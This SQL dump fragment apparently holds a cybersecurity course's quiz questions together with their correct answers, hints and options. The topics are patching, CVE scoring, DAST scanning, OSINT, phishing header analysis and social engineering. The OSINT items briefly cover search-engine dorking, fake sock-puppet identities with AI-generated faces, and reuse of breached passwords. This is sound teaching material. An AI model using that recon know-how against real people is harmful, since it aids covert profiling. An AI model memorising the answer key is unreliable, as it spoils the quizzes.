(5726, 89, 'What is a \"Pilot\" group in patching?', 1, 'A small test subset of production', 0, 'Canary', '2025-12-26 22:11:01', '[\"The IT team\", \"A small test subset of production\", \"The CEO\", \"The printers\"]'),
(5727, 89, 'Why might you skip testing for an \"Emergency\" patch?', 2, 'Immediate exploitation risk', 0, 'Zero Day', '2025-12-26 22:11:01', '[\"Too lazy\", \"Immediate exploitation risk\", \"Patches never fail\", \"Vendor guarantee\"]'),
(5728, 89, 'What allows you to recover if a patch kills a server?', 3, 'Snapshots / Rollback Plan', 0, 'Backup', '2025-12-26 22:11:01', '[\"Reinstalling OS\", \"Snapshots / Rollback Plan\", \"SLA\", \"Vulnerability Scan\"]'),
(5729, 90, 'Who maintains the CVE list?', 1, 'MITRE', 0, 'Organization', '2025-12-26 22:11:01', '[\"Microsoft\", \"MITRE\", \"Google\", \"NSA\"]'),
(5730, 90, 'What is the difference between CVE and CWE?', 2, 'CVE is specific instance, CWE is category', 0, 'Instance vs Class', '2025-12-26 22:11:01', '[\"They are the same\", \"CVE is for Windows, CWE for Linux\", \"CVE is specific instance, CWE is category\", \"CWE is a score\"]'),
(5731, 90, 'What database adds scoring (CVSS) to the CVEs?', 3, 'NVD', 0, 'National Vuln DB', '2025-12-26 22:11:01', '[\"MITRE\", \"OWASP\", \"NVD\", \"CISA\"]'),
(5732, 91, 'Which strategy involves shutting down a risky system?', 1, 'Avoidance', 0, 'Stop activity', '2025-12-26 22:11:01', '[\"Acceptance\", \"Transference\", \"Avoidance\", \"Mitigation\"]'),
(5733, 91, 'Buying insurance is an example of?', 2, 'Transference', 0, 'Moving risk', '2025-12-26 22:11:01', '[\"Acceptance\", \"Avoidance\", \"Transference\", \"Patching\"]'),
(5734, 91, 'If you Accept a risk, what is usually required?', 3, 'Compensating Controls / Sign-off', 0, 'Paperwork', '2025-12-26 22:11:01', '[\"Nothing\", \"Compensating Controls / Sign-off\", \"Patching\", \"Ignoring it\"]'),
(5735, 92, 'Does DAST require source code access?', 1, 'No (Black Box)', 0, 'Dynamic', '2025-12-26 22:11:01', '[\"Yes\", \"No (Black Box)\", \"Sometimes\", \"Only for Javascript\"]'),
(5736, 92, 'Which testing method happens \"running\" against a live app?', 2, 'DAST', 0, 'Dynamic', '2025-12-26 22:11:01', '[\"SAST\", \"DAST\", \"Unit Testing\", \"Linting\"]'),
(5737, 92, 'Why is DAST considered \"Technology Agnostic\"?', 3, 'HTTP is universal', 0, 'Attacks inputs', '2025-12-26 22:11:01', '[\"It knows all languages\", \"HTTP is universal\", \"It compiles code\", \"It uses AI\"]'),
(5738, 93, 'Which vulnerability category covers IDOR (Insecure Direct Object Reference)?', 1, 'Broken Access Control', 0, 'Permissions', '2025-12-26 22:11:01', '[\"Injection\", \"Broken Access Control\", \"Cryptographic Failures\", \"Logging Failures\"]'),
(5739, 93, 'What is the best defense against Injection?', 2, 'Parameterized Queries', 0, 'Prepared Statements', '2025-12-26 22:11:01', '[\"Firewalls\", \"Parameterized Queries\", \"Encryption\", \"Antivirus\"]'),
(5740, 93, 'Storing passwords in plain text falls under which category?', 3, 'Cryptographic Failures', 0, 'Crypto', '2025-12-26 22:11:01', '[\"Injection\", \"Cryptographic Failures\", \"Access Control\", \"Design Flaws\"]'),
(5741, 94, 'What feature prevents ZAP from attacking the entire internet?', 1, 'Scope / Contexts', 0, 'Limits', '2025-12-26 22:11:01', '[\"Firewall\", \"Scope / Contexts\", \"VPN\", \"Cables\"]'),
(5742, 94, 'What is the ZAP HUD?', 2, 'Browser overlay for testing', 0, 'UI', '2025-12-26 22:11:01', '[\"A report format\", \"Browser overlay for testing\", \"A CI pipeline\", \"A virus\"]'),
(5743, 94, 'Can ZAP be integrated into CI/CD pipelines?', 3, 'Yes (Headless/Docker)', 0, 'Automation', '2025-12-26 22:11:01', '[\"No, GUI only\", \"Yes (Headless/Docker)\", \"Only on Windows\", \"Cost extra\"]'),
(5744, 95, 'Why do traditional spiders fail on React apps?', 1, 'Content loads via JS/DOM', 0, 'SPA', '2025-12-26 22:11:01', '[\"React is secure\", \"Content loads via JS/DOM\", \"URLs are encrypted\", \"Firewalls block them\"]'),
(5745, 95, 'What does an AJAX spider use to crawl?', 2, 'A headless browser', 0, 'Rendering', '2025-12-26 22:11:01', '[\"Curl\", \"Wget\", \"A headless browser\", \"Guessing\"]'),
(5746, 95, 'How might an attacker use robots.txt?', 3, 'To find hidden/disallowed paths', 0, 'Recon', '2025-12-26 22:11:01', '[\"To obey rules\", \"To find hidden/disallowed paths\", \"To crash server\", \"To find emails\"]'),
(5747, 96, 'Why is Active Scanning risky in Production?', 1, 'Can delete data or cause DoS', 0, 'Destructive', '2025-12-26 22:11:01', '[\"It is slow\", \"Can delete data or cause DoS\", \"It costs money\", \"It is illegal in Prod\"]'),
(5748, 96, 'How does a Time-Based SQLi test verify the vuln?', 2, 'Measures server delay', 0, 'Timing', '2025-12-26 22:11:01', '[\"Checks error text\", \"Measures server delay\", \"Crashing server\", \"Downloading DB\"]'),
(5749, 96, 'If a scanner hits a \"Contact Us\" form, what happens?', 3, 'Floods inbox with junk', 0, 'Spam', '2025-12-26 22:11:01', '[\"Nothing\", \"Floods inbox with junk\", \"Hacks email\", \"Server reboots\"]'),
(5750, 97, 'If a payload appears in the response, is it always XSS?', 1, 'No, headers/encoding matter', 0, 'False Positive', '2025-12-26 22:11:01', '[\"Yes\", \"No, headers/encoding matter\", \"Only in Chrome\", \"Never\"]'),
(5751, 97, 'Why do Custom 404 pages confuse scanners?', 2, 'They return 200 OK status', 0, 'Status Code', '2025-12-26 22:11:01', '[\"They are hidden\", \"They return 200 OK status\", \"They are slow\", \"They are encrypted\"]'),
(5752, 97, 'What defines a professional analyst reporting DAST results?', 3, 'Manual Verification', 0, 'Curating', '2025-12-26 22:11:01', '[\"Copy-Pasting\", \"Manual Verification\", \"Ignoring Lows\", \"Running in background\"]'),
(5753, 98, 'What is better than reporting 100 individual bugs?', 1, 'Reporting the systemic root cause', 0, 'Grouping', '2025-12-26 22:11:01', '[\"Reporting 1000 bugs\", \"Reporting the systemic root cause\", \"Ignoring them\", \"Quitting\"]'),
(5754, 98, 'What helps a developer understand \"Why\" they should fix it?', 2, 'Risk Explanation', 0, 'Impact', '2025-12-26 22:11:01', '[\"CVSS Score\", \"Risk Explanation\", \"Manager threats\", \"Compliance laws\"]'),
(5755, 98, 'What is a \"PoC\" in reporting?', 3, 'Proof of Concept (Reproduction steps)', 0, 'Evidence', '2025-12-26 22:11:01', '[\"Point of Contact\", \"Proof of Concept (Reproduction steps)\", \"Piece of Code\", \"Priority of Criticality\"]'),
(5756, 160, 'What is the verified first step in the Vulnerability Management Lifecycle?', 1, 'Asset Discovery', 0, 'Finding the machines', '2025-12-26 22:11:01', '[\"Remediation\", \"Asset Discovery\", \"Scanning\", \"Reporting\"]'),
(5757, 160, 'Why is \"Verification\" critical after patching?', 2, 'To ensure the patch actually fixed the issue', 0, 'Trust but verify', '2025-12-26 22:11:01', '[\"It increases billable hours\", \"To ensure the patch actually fixed the issue\", \"To verify the server is fast\", \"It is not critical\"]'),
(5758, 160, 'What term describes unknown/unmanaged systems on a network?', 3, 'Shadow IT', 0, 'Hidden', '2025-12-26 22:11:01', '[\"Dark Web\", \"Shadow IT\", \"Hidden Services\", \"Honeypots\"]'),
(5759, 160, 'Which scan type allows the scanner to log into the target?', 4, 'Authenticated Scan', 0, 'Credentialed', '2025-12-26 22:11:01', '[\"Unauthenticated Scan\", \"Stealth Scan\", \"Authenticated Scan\", \"Passive Scan\"]'),
(5760, 160, 'Which scan is better for an accurate inventory of installed software?', 5, 'Authenticated Scan', 0, 'Registry access', '2025-12-26 22:11:01', '[\"Unauthenticated Scan\", \"Port Scan\", \"Authenticated Scan\", \"Ping Sweep\"]');
INSERT INTO `lesson_questions` (`id`, `task_id`, `question_text`, `question_order`, `correct_answer`, `case_sensitive`, `hint`, `created_at`, `options`) VALUES
(5761, 160, 'What is the main drawback of relying on \"Banner Grabbing\"?', 6, 'Banners can be fake or suppressed', 0, 'Accuracy', '2025-12-26 22:11:01', '[\"It is illegal\", \"Banners can be fake or suppressed\", \"It crashes servers\", \"It takes too long\"]'),
(5762, 160, 'In CVSS, what does \"AV:N\" indicate?', 7, 'Attack Vector: Network', 0, 'Remote', '2025-12-26 22:11:01', '[\"Attack Vector: None\", \"Attack Vector: Network\", \"Anti-Virus: None\", \"Available: No\"]'),
(5763, 160, 'Which CVSS metric measures if the attacker needs someone to click a link?', 8, 'User Interaction (UI)', 0, 'Interaction', '2025-12-26 22:11:01', '[\"Privileges Required (PR)\", \"Attack Complexity (AC)\", \"User Interaction (UI)\", \"Scope (S)\"]'),
(5764, 160, 'A \"Scope Change\" (S:C) in CVSS means expecting what?', 9, 'Impact extending beyond the vulnerable component', 0, 'VM Escape', '2025-12-26 22:11:01', '[\"Impact extending beyond the vulnerable component\", \"Scope is confidential\", \"System crash\", \"No impact\"]'),
(5765, 160, 'Where should you place a scanner to avoid firewall interference?', 10, 'In the same network segment/zone as the target', 0, 'Local', '2025-12-26 22:11:01', '[\"On the internet\", \"In the same network segment/zone as the target\", \"In the DMZ only\", \"On a distinct VLAN\"]'),
(5766, 160, 'Which scan policy determines if a host is simply alive?', 11, 'Host Discovery', 0, 'Ping', '2025-12-26 22:11:01', '[\"Basic Network Scan\", \"Host Discovery\", \"Malware Scan\", \"Web App Scan\"]'),
(5767, 160, 'Why do we avoid aggressive scans on SCADA/ICS systems?', 12, 'They are fragile and may crash', 0, 'Availability', '2025-12-26 22:11:01', '[\"They are secure by default\", \"They are fragile and may crash\", \"They are mostly air-gapped\", \"Nessus cannot see them\"]'),
(5768, 160, 'What is the most important attribute when prioritizing patches?', 13, 'Exploitability (Is there a script?)', 0, 'Risk', '2025-12-26 22:11:01', '[\"CVSS Score only\", \"Alphabetical Order\", \"Exploitability (Is there a script?)\", \"Vendor Name\"]'),
(5769, 160, 'What does Tenable VPR add to the analysis?', 14, 'Real-time threat context', 0, 'Prediction', '2025-12-26 22:11:01', '[\"Nothing\", \"Real-time threat context\", \"Color coding\", \"PDF export\"]'),
(5770, 160, 'What is an \"Emergency\" patch typically reserved for?', 15, 'Zero-Day exploits', 0, 'Log4j scenario', '2025-12-26 22:11:01', '[\"Routine updates\", \"Feature releases\", \"Zero-Day exploits\", \"UI fixes\"]'),
(5771, 160, 'Why must you have a \"Rollback Plan\" before patching?', 16, 'To recover if the patch breaks the server', 0, 'Safety', '2025-12-26 22:11:01', '[\"To uninstall viruses\", \"To recover if the patch breaks the server\", \"Compliance requires it\", \"It is optional\"]'),
(5772, 160, 'Who maintains the official CVE list?', 17, 'MITRE', 0, 'The list owner', '2025-12-26 22:11:01', '[\"NIST\", \"MITRE\", \"Microsoft\", \"Google\"]'),
(5773, 160, 'What is the difference between CVE and CWE?', 18, 'CVE is the specific flaw, CWE is the category', 0, 'Instance vs Type', '2025-12-26 22:11:01', '[\"They are identical\", \"CVE is for software, CWE for hardware\", \"CVE is the specific flaw, CWE is the category\", \"CWE is the score\"]'),
(5774, 160, 'If you cannot patch a system, but isolate it with a firewall, this is called?', 19, 'Remediation (Mitigation)', 0, 'Compensating Control', '2025-12-26 22:11:01', '[\"Acceptance\", \"Remediation (Mitigation)\", \"Transference\", \"Avoidance\"]'),
(5775, 160, 'Buying Cyber Insurance is an example of which risk strategy?', 20, 'Transference', 0, 'Shifting costs', '2025-12-26 22:11:01', '[\"Avoidance\", \"Acceptance\", \"Transference\", \"Mitigation\"]'),
(5776, 181, 'What is the defining characteristic of OSINT?', 1, 'It uses publicly available information', 0, 'Public', '2025-12-26 22:15:15', '[\"It uses hacking tools\", \"It uses spy satellites\", \"It uses publicly available information\", \"It is always illegal\"]'),
(5777, 181, 'Is browsing a company\'s public website considered \"Hacking\"?', 2, 'No, it is Passive OSINT', 0, 'Passive', '2025-12-26 22:15:15', '[\"Yes, immediately\", \"No, it is Passive OSINT\", \"Only if you use Chrome\", \"Only if using VPN\"]'),
(5778, 181, 'Which method gives you information without alerting the target?', 3, 'Passive Reconnaissance', 0, 'Quiet', '2025-12-26 22:15:15', '[\"Active Scanning\", \"Passive Reconnaissance\", \"Phishing\", \"DDoS\"]'),
(5779, 182, 'What is the first step of the Intelligence Cycle?', 1, 'Planning & Direction', 0, 'Goal setting', '2025-12-26 22:15:15', '[\"Collection\", \"Planning & Direction\", \"Analysis\", \"Hacking\"]'),
(5780, 182, 'In which phase do you \"connect the dots\" to form a conclusion?', 2, 'Analysis', 0, 'Thinking', '2025-12-26 22:15:15', '[\"Collection\", \"Analysis\", \"Processing\", \"Scanning\"]'),
(5781, 182, 'What is the output of the \"Collection\" phase?', 3, 'Raw Data', 0, 'Unsorted stuff', '2025-12-26 22:15:15', '[\"Finished Report\", \"Raw Data\", \"Intelligence\", \"Arrests\"]'),
(5782, 183, 'What is a \"Sock Puppet\" in OSINT?', 1, 'A fake online identity', 0, 'Disguise', '2025-12-26 22:15:15', '[\"A hand puppet\", \"A fake online identity\", \"A hacking tool\", \"A VPN protocol\"]'),
(5783, 183, 'Why should you verify your VPN before starting?', 2, 'To hide your Source IP from the target', 0, 'Anonymity', '2025-12-26 22:15:15', '[\"To make internet faster\", \"To hide your Source IP from the target\", \"To access Netflix\", \"To save battery\"]'),
(5784, 183, 'Why use an AI-generated face for a fake profile?', 3, 'Avoids Reverse Image Search detection', 0, 'Uniqueness', '2025-12-26 22:15:15', '[\"It looks better\", \"Avoids Reverse Image Search detection\", \"Real photos are illegal\", \"It is faster\"]'),
(5785, 184, 'Which operator restricts results to a specific website?', 1, 'site:', 0, 'Domain limit', '2025-12-26 22:15:16', '[\"host:\", \"site:\", \"www:\", \"map:\"]'),
(5786, 184, 'How do you find specifically PDF files?', 2, 'filetype:pdf', 0, 'File extension', '2025-12-26 22:15:16', '[\"pdf:\", \"filetype:pdf\", \"ext:adobe\", \"doc:pdf\"]'),
(5787, 184, 'What does `intitle:\"index of\"` typically reveal?', 3, 'Open Directory Listings', 0, 'A list of files', '2025-12-26 22:15:16', '[\"The homepage\", \"Open Directory Listings\", \"Google Maps\", \"DNS records\"]'),
(5788, 185, 'What concept relies on users choosing the same handle everywhere?', 1, 'Username Correlation', 0, 'Reuse', '2025-12-26 22:15:16', '[\"Password Reuse\", \"Username Correlation\", \"Identity Theft\", \"Phishing\"]'),
(5789, 185, 'Which tool checks a username across hundreds of sites?', 2, 'Sherlock', 0, 'Detective', '2025-12-26 22:15:16', '[\"Nmap\", \"Sherlock\", \"Wireshark\", \"Metasploit\"]'),
(5790, 185, 'If a user deletes a post, where might you still find it?', 3, 'Wayback Machine / Archive', 0, 'Time travel', '2025-12-26 22:15:16', '[\"Recycle Bin\", \"Wayback Machine / Archive\", \"Dark Web\", \"Nowhere\"]'),
(5791, 186, 'What does \"HaveIBeenPwned\" tell you?', 1, 'If an email was part of a known breach', 0, 'Leak status', '2025-12-26 22:15:16', '[\"The user\'s password\", \"If an email was part of a known breach\", \"The user\'s location\", \"The user\'s bank\"]'),
(5792, 186, 'What is Hunter.io primarily used for?', 2, 'Finding corporate email formats', 0, 'Business emails', '2025-12-26 22:15:16', '[\"Hacking wifi\", \"Finding corporate email formats\", \"Tracing phones\", \"Buying guns\"]'),
(5793, 186, 'Why is old breach data useful?', 3, 'Password reuse', 0, 'Habits', '2025-12-26 22:15:16', '[\"It isn\'t\", \"Password reuse\", \" blackmail\", \"It proves they are dumb\"]'),
(5794, 187, 'What hidden data in a photo might reveal location?', 1, 'EXIF / GPS Data', 0, 'Metadata', '2025-12-26 22:15:16', '[\"Pixels\", \"EXIF / GPS Data\", \"Color profile\", \"File name\"]'),
(5795, 187, 'Which search engine is famous for its facial recognition capabilities?', 2, 'Yandex', 0, 'Russian one', '2025-12-26 22:15:16', '[\"Bing\", \"DuckDuckGo\", \"Yandex\", \"Yahoo\"]'),
(5796, 187, 'What does Reverse Image Search help you find?', 3, 'Where else the image appears online', 0, 'Sources', '2025-12-26 22:15:16', '[\"The person\'s name\", \"Where else the image appears online\", \"The camera model\", \"The password\"]'),
(5797, 188, 'What record functions as the \"birth certificate\" of a domain?', 1, 'WHOIS', 0, 'Registration', '2025-12-26 22:15:16', '[\"DNS\", \"WHOIS\", \"SSL\", \"HTTP\"]'),
(5798, 188, 'Why do we look for subdomains like \"dev.example.com\"?', 2, 'Often less secure / testing environments', 0, 'Weak targets', '2025-12-26 22:15:16', '[\"They look cool\", \"Often less secure / testing environments\", \"They represent the CEO\", \"They are faster\"]'),
(5799, 188, 'What does \"BuiltWith\" tell you?', 3, 'The technology stack used', 0, 'Tech', '2025-12-26 22:15:16', '[\"Who owns it\", \"The technology stack used\", \"The password\", \"The bugs\"]'),
(5800, 189, 'What tool maps Wifi SSIDs to GPS coordinates?', 1, 'Wigle.net', 0, 'Wifi map', '2025-12-26 22:15:16', '[\"Google Maps\", \"Wigle.net\", \"Shodan\", \"WifiCracker\"]'),
(5801, 189, 'What feature of Google Earth helps verify \"When\" a satellite image was taken?', 2, 'Historical Imagery', 0, 'Timeline', '2025-12-26 22:15:16', '[\"Street View\", \"Historical Imagery\", \"3D Buildings\", \"Atmosphere\"]'),
(5802, 189, 'How can SunCalc help in IMINT?', 3, 'Determine time of day from shadows', 0, 'Shadows', '2025-12-26 22:15:16', '[\"Find the weather\", \"Determine time of day from shadows\", \"Find solar panels\", \"Navigate\"]'),
(5803, 190, 'What does OSINT stand for?', 1, 'Open Source Intelligence', 0, 'Open Source', '2025-12-26 22:15:16', '[\"Open Source Intelligence\", \"Overseas Intelligence\", \"Online Security INTerface\", \"Open System Integration\"]'),
(5804, 190, 'Is Passive OSINT illegal?', 2, 'Generally No (accessing public data)', 0, 'No', '2025-12-26 22:15:16', '[\"Yes, always\", \"Generally No (accessing public data)\", \"Only in Europe\", \"Only for police\"]'),
(5805, 190, 'What is the best way to protect your identity during research?', 3, 'Use a Sock Puppet and VPN', 0, 'OPSEC', '2025-12-26 22:15:16', '[\"Clear cookies\", \"Use a Sock Puppet and VPN\", \"Use Incognito Mode\", \"Ask permission\"]'),
(5806, 190, 'Which Google Dork finds Excel files?', 4, 'filetype:xlsx', 0, 'Spreadsheet', '2025-12-26 22:15:16', '[\"file:excel\", \"filetype:xlsx\", \"type:xls\", \"ext:sheet\"]'),
(5807, 190, 'Which operator searches for text inside the URL?', 5, 'inurl:', 0, 'URL text', '2025-12-26 22:15:16', '[\"site:\", \"inurl:\", \"link:\", \"addr:\"]'),
(5808, 190, 'If you want to view a deleted page, what Google operator helps?', 6, 'cache:', 0, 'Snapshot', '2025-12-26 22:15:16', '[\"history:\", \"cache:\", \"old:\", \"back:\"]'),
(5809, 190, 'Which tool is best for checking username reuse across 300+ sites?', 7, 'Sherlock', 0, 'Python script', '2025-12-26 22:15:16', '[\"Nessus\", \"Sherlock\", \"John the Ripper\", \"Wireshark\"]'),
(5810, 190, 'What service helps you find the email format for a company (e.g., first.last)?', 8, 'Hunter.io', 0, 'Email patterns', '2025-12-26 22:15:16', '[\"HaveIBeenPwned\", \"Hunter.io\", \"Gmail\", \"Outlook\"]'),
(5811, 190, 'What does \"HaveIBeenPwned\" check?', 9, 'If an email is in a known data breach', 0, 'Breaches', '2025-12-26 22:15:16', '[\"The email password\", \"If an email is in a known data breach\", \"If the email is valid\", \"Who owns the email\"]'),
(5812, 190, 'Which search engine is preferred for facial recognition checks?', 10, 'Yandex', 0, 'Russian AI', '2025-12-26 22:15:16', '[\"Bing\", \"Google\", \"Yandex\", \"DuckDuckGo\"]'),
(5813, 190, 'What metadata in a photo provides GPS coordinates?', 11, 'EXIF', 0, 'Tags', '2025-12-26 22:15:16', '[\"Pixel\", \"EXIF\", \"PNG\", \"Stenography\"]'),
(5814, 190, 'What tool lets you search for Wifi hotspots by SSID?', 12, 'Wigle.net', 0, 'War driving DB', '2025-12-26 22:15:16', '[\"WifiMap\", \"Wigle.net\", \"Google Wifi\", \"NetStumbler\"]'),
(5815, 190, 'What record tells you who owns a domain name?', 13, 'WHOIS', 0, 'Registry', '2025-12-26 22:15:16', '[\"DNS\", \"WHOIS\", \"ARP\", \"DHCP\"]'),
(5816, 190, 'What tool visualizes domain infrastructure and subdomains as a graph?', 14, 'DNSDumpster', 0, 'Graph', '2025-12-26 22:15:16', '[\"Nmap\", \"DNSDumpster\", \"Ping\", \"Traceroute\"]'),
(5817, 190, 'Why are subdomains like \"dev\" or \"staging\" valuable targets?', 15, 'Often have weaker security/config', 0, 'Forgotten', '2025-12-26 22:15:16', '[\"They are faster\", \"Often have weaker security/config\", \"They are public\", \"They have more money\"]'),
(5818, 190, 'What is the \"Intelligence Cycle\" step where you interpret data?', 16, 'Analysis', 0, 'Reasoning', '2025-12-26 22:15:16', '[\"Collection\", \"Analysis\", \"Planning\", \"Filing\"]'),
(5819, 190, 'What is a \"Grey Hat\" OSINT source?', 17, 'Semi-legal/paid breach data sites', 0, 'DeHashed', '2025-12-26 22:15:16', '[\"Government sites\", \"Semi-legal/paid breach data sites\", \"News sites\", \"Libraries\"]'),
(5820, 190, 'Why should you verify \"Sock Puppets\" with a burner phone?', 18, 'Platforms require SMS verification', 0, '2FA', '2025-12-26 22:15:16', '[\"To call the target\", \"Platforms require SMS verification\", \"To look cool\", \"It is cheaper\"]'),
(5821, 190, 'What is \"Google Hacking\"?', 19, 'Using advanced operators to find sensitive info', 0, 'Dorking', '2025-12-26 22:15:16', '[\"Hacking Google servers\", \"Using advanced operators to find sensitive info\", \"Phishing Google employees\", \"Using Chrome\"]'),
(5822, 190, 'What is the primary risk of \"Active\" recon (like port scanning)?', 20, 'It generates logs/alerts on the target', 0, 'Detection', '2025-12-26 22:15:16', '[\"It is slow\", \"It generates logs/alerts on the target\", \"It costs money\", \"Nothing\"]'),
(5823, 191, 'Which header field usually matches the actual Envelope Sender?', 1, 'Return-Path', 0, 'Return', '2025-12-26 22:17:47', '[\"Reply-To\", \"Return-Path\", \"From\", \"Subject\"]'),
(5824, 191, 'If \"From\" is \"ceo@company.com\" but \"Return-Path\" is \"hacker@gmail.com\", what is this called?', 2, 'Spoofing', 0, 'Mismatch', '2025-12-26 22:17:47', '[\"Phishing\", \"Spoofing\", \"Spam\", \"Relaying\"]'),
(5825, 191, 'Are \"Message Headers\" authenticated by default?', 3, 'No, they can be easily faked', 0, 'No', '2025-12-26 22:17:47', '[\"Yes, strictly\", \"No, they can be easily faked\", \"Only on Gmail\", \"Only on Outlook\"]'),
(5826, 192, 'Which protocol uses a DNS list of allowed Sender IPs?', 1, 'SPF', 0, 'Sender Policy', '2025-12-26 22:17:47', '[\"SPF\", \"DKIM\", \"DMARC\", \"POP3\"]'),
(5827, 192, 'What does DKIM prevent?', 2, 'Tampering / Modification', 0, 'Integrity', '2025-12-26 22:17:47', '[\"Spoofing IP\", \"Tampering / Modification\", \"Spam\", \"Viruses\"]'),
(5828, 192, 'If DMARC policy is \"p=reject\", what happens to spoofed emails?', 3, 'They are blocked/deleted', 0, 'Reject', '2025-12-26 22:17:47', '[\"Delivered to Inbox\", \"Sent to Spam\", \"They are blocked/deleted\", \"Returned to sender\"]'),
(5829, 193, 'What is \"Typosquatting\"?', 1, 'Registering a domain that looks like the real one', 0, 'Misspelling', '2025-12-26 22:17:47', '[\"Hacking DNS\", \"Registering a domain that looks like the real one\", \"Stealing passwords\", \"Deleting data\"]'),
(5830, 193, 'The \"From\" header says \"tesla-corp.io\". Why is this suspicious?', 2, 'It is not the official trusted domain', 0, 'Fake domain', '2025-12-26 22:17:47', '[\"It is too long\", \"It is not the official trusted domain\", \"It uses hyphens\", \"It is fine\"]'),
(5831, 193, 'What psychological trigger is used in \"URGENT WIRE TRANSFER\"?', 3, 'Urgency / Panic', 0, 'Fear', '2025-12-26 22:17:47', '[\"Greed\", \"Urgency / Panic\", \"Curiosity\", \"Authority\"]'),
(5832, 194, 'Why is \"file.pdf.exe\" dangerous?', 1, 'Windows hides the .exe extension', 0, 'Double extension', '2025-12-26 22:17:47', '[\"It is a PDF\", \"Windows hides the .exe extension\", \"It is corrupt\", \"It is encrypted\"]'),
(5833, 194, 'What is the first safe step when you have a suspicious file?', 2, 'Hash it and check VirusTotal', 0, 'Hashing', '2025-12-26 22:17:47', '[\"Open it\", \"Hash it and check VirusTotal\", \"Email it to IT\", \"Rename it\"]'),
(5834, 194, 'What does \"X-PHP-Originating-Script\" usually indicate?', 3, 'Sent via a web script/bot', 0, 'Automated', '2025-12-26 22:17:47', '[\"Sent by Outlook\", \"Sent via a web script/bot\", \"Sent by Gmail\", \"Legitimate marketing\"]'),
(5835, 195, 'What does \"Defanging\" a URL mean?', 1, 'Making it unclickable', 0, 'Safety', '2025-12-26 22:17:47', '[\"Deleting it\", \"Making it unclickable\", \"Encrypting it\", \"Clicking it\"]'),
(5836, 195, 'If SPF fails for \"microsoft.com\", what does it mean?', 2, 'The sender IP is not Microsoft', 0, 'Spoofing', '2025-12-26 22:17:47', '[\"Microsoft is down\", \"The sender IP is not Microsoft\", \"The email is legitimate\", \"DNS is broken\"]'),
(5837, 195, 'What is suspicious about \"login.microsoft.com.xyz\"?', 3, 'The TLD is .xyz, not .com', 0, 'Fake domain', '2025-12-26 22:17:47', '[\"It is too short\", \"The TLD is .xyz, not .com\", \"It contains login\", \"It is secure\"]'),
(5838, 196, 'What is the TRUE sender address (Return-Path)?', 1, 'support-ticket-882@gmail.com', 0, 'Return Path', '2025-12-26 22:17:47', '[\"admin@company.com\", \"support-ticket-882@gmail.com\", \"victim@company.com\", \"mail.attacker-infrastructure.net\"]'),
(5839, 196, 'Who does the email CLAIM to be from (Display Name)?', 2, 'IT Service Desk', 0, 'Fake Name', '2025-12-26 22:17:47', '[\"Support Ticket\", \"IT Service Desk\", \"Gmail Team\", \"HR\"]'),
(5840, 196, 'Look at the X-Mailer. What software sent this?', 3, 'OstroMail v1.2 (Mass Mailer)', 0, 'Mass Mailer', '2025-12-26 22:17:47', '[\"Outlook\", \"Gmail\", \"OstroMail v1.2 (Mass Mailer)\", \"iPhone Mail\"]'),
(5841, 196, 'Did SPF pass or fail?', 4, 'Pass', 0, 'Pass', '2025-12-26 22:17:47', '[\"Fail\", \"SoftFail\", \"Pass\", \"Neutral\"]'),
(5842, 196, 'Why is this suspicious, despite SPF passing?', 5, 'Sender authenticated as Gmail, but spoofed Company header', 0, 'Mismatch', '2025-12-26 22:17:47', '[\"SPF failed\", \"Sender authenticated as Gmail, but spoofed Company header\", \"It came from Microsoft\", \"The date is wrong\"]'),
(5843, 201, 'Which principle relies on the target\'s fear of disobeying a superior?', 1, 'Authority', 0, 'Boss', '2025-12-26 22:28:54', '[\"Reciprocity\", \"Authority\", \"Liking\", \"Consistency\"]'),
(5844, 201, '\"Act now or lose your account!\" exploits which psychological trigger?', 2, 'Urgency / Scarcity', 0, 'Panic', '2025-12-26 22:28:54', '[\"Trust\", \"Urgency / Scarcity\", \"Social Proof\", \"Kindness\"]'),
(5845, 201, 'What is the best immediate defense when you feel \"rushed\" by a request?', 3, 'Stop and Verify', 0, 'Pause', '2025-12-26 22:28:54', '[\"Do it quickly\", \"Stop and Verify\", \"Argue\", \"Ignore it\"]'),
(5846, 202, 'What is \"Pretexting\"?', 1, 'Creating a fake scenario to trick a victim', 0, 'Story', '2025-12-26 22:28:54', '[\"Guessing passwords\", \"Creating a fake scenario to trick a victim\", \"Scanning ports\", \"Coding malware\"]'),
(5847, 202, 'Who is a common persona for attackers to impersonate?', 2, 'IT Support', 0, 'Help Desk', '2025-12-26 22:28:54', '[\"The Janitor\", \"IT Support\", \"A stranger\", \"A dog\"]'),
(5848, 202, 'How do you defeat an impersonator on the phone?', 3, 'Call them back on a verified number', 0, 'Callback', '2025-12-26 22:28:54', '[\"Ask their name\", \"Call them back on a verified number\", \"Yell at them\", \"Tracing the call\"]'),
(5849, 203, 'What is \"Vishing\"?', 1, 'Phishing conducted over the phone', 0, 'Voice', '2025-12-26 22:28:54', '[\"Video Phishing\", \"Phishing conducted over the phone\", \"Virtual Fishing\", \"Virus Phishing\"]'),
(5850, 203, 'Why is Caller ID not a reliable way to verify a caller?', 2, 'It can be easily spoofed', 0, 'Fake numbers', '2025-12-26 22:28:54', '[\"It is encrypted\", \"It can be easily spoofed\", \"It costs money\", \"It is old tech\"]'),
(5851, 203, 'What payment method is a major red flag for scam calls?', 3, 'Gift Cards', 0, 'iTunes', '2025-12-26 22:28:54', '[\"Credit Card\", \"Gift Cards\", \"Wire Transfer\", \"Check\"]'),
(5852, 204, 'What makes Smishing URLs harder to inspect than email URLs?', 1, 'Mobile interfaces make hovering/previewing difficult', 0, 'No mouse', '2025-12-26 22:28:54', '[\"They are encrypted\", \"Mobile interfaces make hovering/previewing difficult\", \"They are faster\", \"They are secure\"]'),
(5853, 204, 'What is a common \"Lure\" for SMS attacks?', 2, 'Missed package delivery', 0, 'USPS', '2025-12-26 22:28:54', '[\"Free pizza\", \"Missed package delivery\", \"Weather alert\", \"News update\"]'),
(5854, 204, 'If you get a suspicious text from your \"Bank\", what should you do?', 3, 'Log in via the official App or Website', 0, 'Direct access', '2025-12-26 22:28:54', '[\"Click the link\", \"Log in via the official App or Website\", \"Reply STOP\", \"Call the number in the text\"]'),
(5855, 205, 'What constitutes \"Tailgating\"?', 1, 'Following someone into a secure area without badging in', 0, 'Piggyback', '2025-12-26 22:28:54', '[\"Driving too close\", \"Following someone into a secure area without badging in\", \"Breaking a lock\", \"Hacking a badge reader\"]'),
(5856, 205, 'How do attackers exploit \"politeness\" to bypass physical security?', 2, 'Holding the door for someone carrying items', 0, 'Heavy box', '2025-12-26 22:28:54', '[\"Buying lunch\", \"Holding the door for someone carrying items\", \"Saying please\", \"Dressing nice\"]'),
